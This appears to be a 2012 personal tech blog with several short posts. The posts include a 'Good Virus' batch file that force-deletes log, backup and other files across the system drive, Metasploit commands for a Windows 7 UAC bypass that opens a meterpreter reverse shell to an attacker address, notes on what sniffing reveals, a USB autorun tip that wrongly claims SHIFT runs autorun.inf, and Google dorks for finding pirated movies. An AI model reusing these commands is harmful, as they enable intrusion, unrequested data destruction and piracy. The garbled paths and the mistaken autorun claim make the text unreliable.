Tuesday, 13 November 2012

Good Virus - Clean and Speed your PC

Create a .BAT file and make your PC to work faster.

Open a File, paste the below code and save it as GoodVirus.bat


@echo off
echo Internet Sweep ....
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old

del /f /s /q %systemdrive%\recycled\*.*
echo Cleaned Temporary Data
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*

echo Cleaning IE Temp data.....
del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*?
del /f /s /q ?%userprofile%\Local Settings\Temp\*.*?
del /f /s /q ?%userprofile%\recent\*.*?
echo Completed!!!

echo Your PC is now Speed enough :)
echo. & pause

Monday, 15 October 2012

Windows 7 is hacked !!!! Threat: UAC


Test-Bed

Attacker: Backtrack 5
Victim PC: Windows 7 - UPDATED
[Attacker] ----------|Switch/Router|----------[Victim]
Procedure
1. Update MSFCONSOLE repository 
      #msf update 
2. Prepare Attacker Machine
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.9.9
set session 1
exploit
3. OUTPUT
     "Windows7 is hacked"

Saturday, 4 February 2012

Network Sniffing - Facts

Few secrets which can be revealed by Sniffing:
1. Mac & IP's --> Helpful for Spoofing (Hide identity / Intend as authorised user)
2. Exposing Services --> Revealing running services & versions 
3. Passwords --> Plain text protocols 
4. Security Feature Detection --> Running security (FW/AV/IPS/VPN/WAF) functionality
5. Debugging --> Confirmance, IOT, etc..
6. Investigations --> POST analysis


Tuesday, 10 January 2012

How to STOP spreading Viruses from USB

Simple trick can make us stop Malware/Virus infect our Windows machine.

After having this setting even if USB is infected, our machine will not get infected. Unless we dont manually click the virus.

1. Open REGEDIT from RUN
    Got to path  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now, locate NoDriveTypeAutoRun on right panel and change the value to b5 and click OK.
Note: Reboot the machine to have effect.

2. Else, While inserting the USB into the machine pressing SHIFT key will help you to execute Autorun.inf file, which results in stopping virus infection.

Removing Virus from USB:
1. Once the USB is inserted and ensuring that malware is not executed. Go to CMD and get into the drive by typing the drive letter.
2. type attrib -h -s autorun.inf /s /d
3. del autorun.inf
4. del <associated exe/pif/bat/vbs file intended to run from autorun.inf file>
    Ex: del newfolder.exe

Hurray!!!!!!!!  Now your machine and USB are Virus Freeeeeee.....

Monday, 2 January 2012

Search Movies Using Google

Movies
Google Search: 
        1. inurl:"forum" intext:"<movie name>" intext:"megaupload.com" <lang>
           Ex:  inurl:"forum" intext:"kung-fu" intext:"megaupload.com" English
                          --> You can remove the last string "English" as per ur search results

       2. inurl:"<movie name>" intext:"megaupload.com" <lang>

       3. intitle:"<movie name>" intext:"movie" (mp4|avi|rar|mpeg) 

Songs: Above search is applicable


you can replace megaupload with Filestube, Filesonic, 4share, etc.... till you get the result


Enjoy Moviking!!!!!!